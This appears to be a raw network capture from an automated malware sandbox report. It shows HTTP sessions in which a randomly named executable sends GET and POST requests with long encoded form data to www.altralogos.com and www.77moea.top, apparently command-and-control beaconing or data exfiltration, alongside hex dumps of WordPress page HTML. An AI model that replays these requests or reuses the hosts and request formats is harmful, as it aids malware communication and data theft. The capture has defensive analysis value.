69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                                                                                                            Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                                                                                                            Dec 8, 2023 14:53:09.144112110 CET1286INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                                                                                                            Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                                                                                                            Dec 8, 2023 14:53:09.144154072 CET1286INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                                                                                                            Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                                                                                                            Dec 8, 2023 14:53:09.144232035 CET1286INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                                                                                                            Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                                                                                                            Dec 8, 2023 14:53:09.144350052 CET1286INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                                                                                                            Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                                                                                                            Dec 8, 2023 14:53:09.144428015 CET1286INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                                                                                                            Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                                                                                                            Dec 8, 2023 14:53:09.144531965 CET1286INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                                                                                                            Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.2" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                                                                                                            Dec 8, 2023 14:53:09.144624949 CET1286INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                                                                                                            Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                                                                                                            Dec 8, 2023 14:53:09.144694090 CET1286INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                                                                                                            Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                                                                                                            Dec 8, 2023 14:53:09.144754887 CET1286INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                                                                                                            Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                                                                                                            Dec 8, 2023 14:53:09.383884907 CET1286INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                                                                                                            Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            44192.168.2.449784185.74.252.11805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:10.644355059 CET471OUTGET /ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.altralogos.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:53:11.383486032 CET500INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:10 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Powered-By: PHP/7.4.33
                                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                            X-Redirect-By: WordPress
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Location: http://altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0He
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            45192.168.2.449785107.178.250.177805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:18.315771103 CET732OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.77moea.top
                                                                                                                                                            Origin: http://www.77moea.top
                                                                                                                                                            Referer: http://www.77moea.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 4f 44 54 79 41 44 41 54 46 53 38 59 58 66 65 39 2b 63 2f 4b 73 69 48 42 65 56 67 76 37 4d 77 37 5a 30 4d 70 75 72 74 46 68 30 50 6e 65 59 6e 66 6c 6c 72 66 57 4b 58 6b 4d 76 6e 6a 38 55 31 77 4e 50 69 45 51 4c 76 67 79 5a 62 52 6c 46 6d 76 48 79 37 64 61 6e 39 78 59 64 2f 77 6b 68 53 46 31 32 64 55 65 67 51 49 4d 54 35 66 73 42 70 51 73 62 57 7a 57 45 2f 4b 42 75 6e 47 4b 63 68 4f 65 66 35 75 70 57 71 72 75 42 73 6c 66 67 6a 44 4c 72 48 66 2b 67 61 4d 4f 5a 69 41 4e 45 61 51 6a 42 71 36 6e 67 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=b6dZwGuJuttsODTyADATFS8YXfe9+c/KsiHBeVgv7Mw7Z0MpurtFh0PneYnfllrfWKXkMvnj8U1wNPiEQLvgyZbRlFmvHy7dan9xYd/wkhSF12dUegQIMT5fsBpQsbWzWE/KBunGKchOef5upWqruBslfgjDLrHf+gaMOZiANEaQjBq6ng==
                                                                                                                                                            Dec 8, 2023 14:53:18.642144918 CET333INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:18 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            46192.168.2.449786107.178.250.177805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:20.967322111 CET752OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.77moea.top
                                                                                                                                                            Origin: http://www.77moea.top
                                                                                                                                                            Referer: http://www.77moea.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 50 69 6a 79 42 6b 73 54 56 43 38 62 5a 2f 65 39 33 38 2f 4f 73 69 4c 42 65 55 56 71 36 34 63 37 65 52 67 70 76 71 74 46 69 30 50 6e 47 6f 6d 58 68 6c 72 45 57 4b 72 73 4d 72 6e 6a 38 56 56 77 4e 50 53 45 52 36 76 68 79 4a 62 54 6a 46 6d 74 44 79 37 64 61 6e 39 78 59 64 37 61 6b 68 4b 46 31 46 56 55 52 69 34 4a 47 7a 35 63 6d 68 70 51 6f 62 57 33 57 45 2b 66 42 76 37 6f 4b 65 70 4f 65 65 6c 75 70 48 71 71 68 42 73 6e 51 41 69 42 4e 70 32 32 79 42 47 46 50 50 75 41 4e 41 4f 4f 69 55 47 70 67 63 4e 4a 39 32 6f 32 61 58 33 58 4c 2f 66 53 70 79 6b 73 52 42 34 3d
                                                                                                                                                            Data Ascii: XveXHZvx=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq64c7eRgpvqtFi0PnGomXhlrEWKrsMrnj8VVwNPSER6vhyJbTjFmtDy7dan9xYd7akhKF1FVURi4JGz5cmhpQobW3WE+fBv7oKepOeelupHqqhBsnQAiBNp22yBGFPPuANAOOiUGpgcNJ92o2aX3XL/fSpyksRB4=
                                                                                                                                                            Dec 8, 2023 14:53:21.291337967 CET176INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:21 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Dec 8, 2023 14:53:21.294703007 CET157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            47192.168.2.449787107.178.250.177805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:23.626859903 CET10834OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.77moea.top
                                                                                                                                                            Origin: http://www.77moea.top
                                                                                                                                                            Referer: http://www.77moea.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 50 69 6a 79 42 6b 73 54 56 43 38 62 5a 2f 65 39 33 38 2f 4f 73 69 4c 42 65 55 56 71 36 35 49 37 65 6a 6f 70 75 4e 78 46 6a 30 50 6e 4c 49 6d 57 68 6c 71 55 57 4f 48 67 4d 72 6a 7a 38 51 52 77 4d 73 61 45 57 50 50 68 34 4a 62 54 76 6c 6d 73 48 79 36 46 61 6e 74 31 59 63 4c 61 6b 68 4b 46 31 45 6c 55 56 77 51 4a 41 7a 35 66 73 42 70 55 73 62 57 50 57 41 71 50 42 76 50 57 4b 76 4a 4f 65 2b 31 75 73 31 79 71 2b 78 73 70 54 41 69 6a 4e 70 36 74 79 46 6e 38 50 4c 76 72 4e 44 53 4f 6e 43 44 45 34 38 78 4e 67 32 38 43 48 31 76 56 4c 76 76 66 78 53 6b 51 48 52 4d 43 63 5a 34 59 34 74 2f 53 7a 6a 42 67 77 6b 39 78 52 76 41 50 7a 63 51 67 68 53 72 63 55 70 6a 79 70 73 2b 4d 2b 79 44 57 54 44 2b 34 76 67 75 56 59 54 61 4c 4c 4b 53 7a 70 46 6c 6b 52 6b 6c 65 64 43 2b 78 58 78 63 61 78 53 65 6a 6f 66 41 75 33 6e 50 68 78 73 7a 66 76 6f 6b 76 6f 55 6f 62 46 4c 43 74 6e 5a 31 56 64 5a 58 49 61 31 73 73 63 52 38 43 58 4b 57 58 52 33 32 31 64 6e 38 70 78 6a 6e 55 4e 36 46 4d 79 37 4a 5a 6c 2b 44 51 4b 77 75 37 68 34 74 38 67 53 46 43 36 30 32 52 42 43 57 70 2f 33 6d 6b 61 5a 62 6a 49 75 4a 6d 34 76 43 41 73 61 4d 4f 43 58 56 61 39 59 7a 52 77 75 67 6e 6e 43 31 47 69 5a 6b 50 6a 4f 79 55 30 39 6f 33 76 5a 58 70 44 65 35 50 54 41 73 47 44 74 6a 52 56 65 31 61 57 79 53 65 6a 71 70 30 5a 4a 51 6b 58 2b 37 6a 66 38 37 58 2f 54 4a 2b 30 53 4e 53 4d 4e 44 35 31 74 45 37 6c 36 31 6b 61 46 61 30 37 63 45 79 6c 48 69 74 63 76 65 64 7a 34 45 4a 36 58 75 39 68 43 74 4a 59 50 6b 4d 42 6c 4e 59 39 41 64 2f 52 70 4c 61 2f 61 34 4d 4d 59 31 32 43 53 33 6d 69 6f 71 6f 4b 39 79 2b 55 4c 46 31 4a 4e 6e 72 57 65 49 7a 42 67 51 30 45 4a 37 33 79 46 63 48 6e 62 35 48 51 65 4a 44 45 30 34 59 41 2f 33 53 4c 36 58 78 64 5a 6d 54 37 31 64 4e 74 79 30 6d 61 58 57 6c 61 63 63 51 4c 35 65 67 33 6a 67 30 34 68 4f 71 6c 66 4c 6d 4f 6d 64 42 31 6b 41 46 38 31 37 46 33 41 6a 68 4b 79 58 6a 36 6e 4c 55 7a 32 73 59 71 2b 62 59 59 6e 4a 58 7a 45 5a 71 31 54 38 62 50 71 30 36 49 66 32 73 62 2b 65 30 33 35 70 51 31 69 68 48 77 42 50 58 63 4e 72 2b 79 64 74 43 71 53 33 4c 5a 72 34 74 4b 77 78 45 75 57 31 56 35 74 78 71 45 67 53 77 73 37 67 52 7a 47 6f 6e 4c 50 39 67 64 66 4f 79 50 69 5a 6b 52 74 62 44 61 51 52 5a 5a 6b 5a 52 44 62 74 65 64 4a 74 31 6d 2b 4e 56 6e 6a 36 6b 42 4a 6c 72 76 53 67 4c 78 69 32 39 50 34 57 6d 4f 4e 37 48 41 32 72 69 63 41 31 4a 69 64 53 43 56 75 74 49 51 57 36 4c 4a 6b 35 75 61 41 55 56 4e 43 44 34 62 35 2b 41 66 31 39 51 45 71 67 77 63 38 4e 4e 79 6c 47 70 54 58 79 4a 37 6c 61 2f 57 33 55 47 69 46 38 79 57 67 2f 67 6d 6b 4b 65 45 41 4d 6e 33 4c 34 51 52 69 37 77 50 74 42 71 77 45 52 41 64 63 69 4e 78 6e 34 78 4d 34 30 38 66 76 62 49 42 4a 68 64 2f 55 35 73 2f 39 7a 49 30 38 34 78 79 35 39 64 65 4a 37 55 77 76 31 51 61 6d 39 6e 63 38 57 48 74 46 79 31 53 35 59 34 68 71 55 47 34 66 36 37 39 75 38 45 34 30 4f 63 78 58 49 68 35 61 77 2f 65 58 64 59 7a 6b 56 53 51 4a 38 55 37 36 76 79 56 2b 33 36 69 36 57 59 71 39 4b 55 6c 57 42 62 58 59 46 56 39 67 36 37 59 63 4e 4c 53 39 52 77 6f 44 55 2f 77 39 43 70 79 32 64 53 45 32 6f 76 62 42 36 50 44 71 48 57 2b 52 42 35 4d 56 66 4a 7a 73 63 6f 4f 41 6a 65 62 6c 44 33 2f 72 49 77 36 72 6d 54 4d 78 57 79 6c 6a 65 54 2f 32 6b 49 57 54 4a 6f 4a 62 45 37 58 71 63 30 78 51 38 7a 52 65 6e 66 6e 65 6f 4c 78 39 59 5a 46 68 79 67 52 70 2f 78 77 6a 32 59 43 37 72 6d 32 31 55 31 6b 53 4b 47 4a 76 54 5a 46 6e 43 76 49 53 76 68 53 61 74 4a 57 48 4c 44 78 45 76 64 52 4b 47 58 37 56 54 39 57 47 36 44 31 34 2f 72 75 44 53 67 6f 36 4e 47 51 35 31 33 32 6c 4d 79 72 4f 33 38 70 68 57 33 2b 39 30 73 58 2b 6b 41 2b 67 2f 4e 43 79 69 63 73 57 4c 43 77 6e 78 33 44 6d 6d 53 44 54 39 35 6f 37 61 5a 4b 51 6b 45 43 43 37 41 6e 4e 55 37 56 4d 41 70 2b 4b 6a 39 46 6c 41 38 73 4a 33 5a 7a 36 4d 62 4c 52 7a 71 73 51 55 4f 53 72 44 44 39 62 36 41 2f 61 6a 52 37 73 66 79 43 6e 76 7a 38 6a 63 42 6a 4e 75 4c 49 30 7a 65 47 79 4b 52 65 46 38 64 36 75 5a 61 39 51 5a 54 79 5a 6b 42 2f 39 67 39 48 65 36 30 31 74 45 6b 79 66 38 51 6e 33 73 6b 36 5a 4e 51 55 79 39 31 31 44 75 2b 32 30
                                                                                                                                                            Data Ascii: XveXHZvx=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq65I7ejopuNxFj0PnLImWhlqUWOHgMrjz8QRwMsaEWPPh4JbTvlmsHy6Fant1YcLakhKF1ElUVwQJAz5fsBpUsbWPWAqPBvPWKvJOe+1us1yq+xspTAijNp6tyFn8PLvrNDSOnCDE48xNg28CH1vVLvvfxSkQHRMCcZ4Y4t/SzjBgwk9xRvAPzcQghSrcUpjyps+M+yDWTD+4vguVYTaLLKSzpFlkRkledC+xXxcaxSejofAu3nPhxszfvokvoUobFLCtnZ1VdZXIa1sscR8CXKWXR321dn8pxjnUN6FMy7JZl+DQKwu7h4t8gSFC602RBCWp/3mkaZbjIuJm4vCAsaMOCXVa9YzRwugnnC1GiZkPjOyU09o3vZXpDe5PTAsGDtjRVe1aWySejqp0ZJQkX+7jf87X/TJ+0SNSMND51tE7l61kaFa07cEylHitcvedz4EJ6Xu9hCtJYPkMBlNY9Ad/RpLa/a4MMY12CS3mioqoK9y+ULF1JNnrWeIzBgQ0EJ73yFcHnb5HQeJDE04YA/3SL6XxdZmT71dNty0maXWlaccQL5eg3jg04hOqlfLmOmdB1kAF817F3AjhKyXj6nLUz2sYq+bYYnJXzEZq1T8bPq06If2sb+e035pQ1ihHwBPXcNr+ydtCqS3LZr4tKwxEuW1V5txqEgSws7gRzGonLP9gdfOyPiZkRtbDaQRZZkZRDbtedJt1m+NVnj6kBJlrvSgLxi29P4WmON7HA2ricA1JidSCVutIQW6LJk5uaAUVNCD4b5+Af19QEqgwc8NNylGpTXyJ7la/W3UGiF8yWg/gmkKeEAMn3L4QRi7wPtBqwERAdciNxn4xM408fvbIBJhd/U5s/9zI084xy59deJ7Uwv1Qam9nc8WHtFy1S5Y4hqUG4f679u8E40OcxXIh5aw/eXdYzkVSQJ8U76vyV+36i6WYq9KUlWBbXYFV9g67YcNLS9RwoDU/w9Cpy2dSE2ovbB6PDqHW+RB5MVfJzscoOAjeblD3/rIw6rmTMxWyljeT/2kIWTJoJbE7Xqc0xQ8zRenfneoLx9YZFhygRp/xwj2YC7rm21U1kSKGJvTZFnCvISvhSatJWHLDxEvdRKGX7VT9WG6D14/ruDSgo6NGQ5132lMyrO38phW3+90sX+kA+g/NCyicsWLCwnx3DmmSDT95o7aZKQkECC7AnNU7VMAp+Kj9FlA8sJ3Zz6MbLRzqsQUOSrDD9b6A/ajR7sfyCnvz8jcBjNuLI0zeGyKReF8d6uZa9QZTyZkB/9g9He601tEkyf8Qn3sk6ZNQUy911Du+20cGn/4HieKHhK76gJ2+K+/F5YSMNjwDdlE/AQ8K1ILt6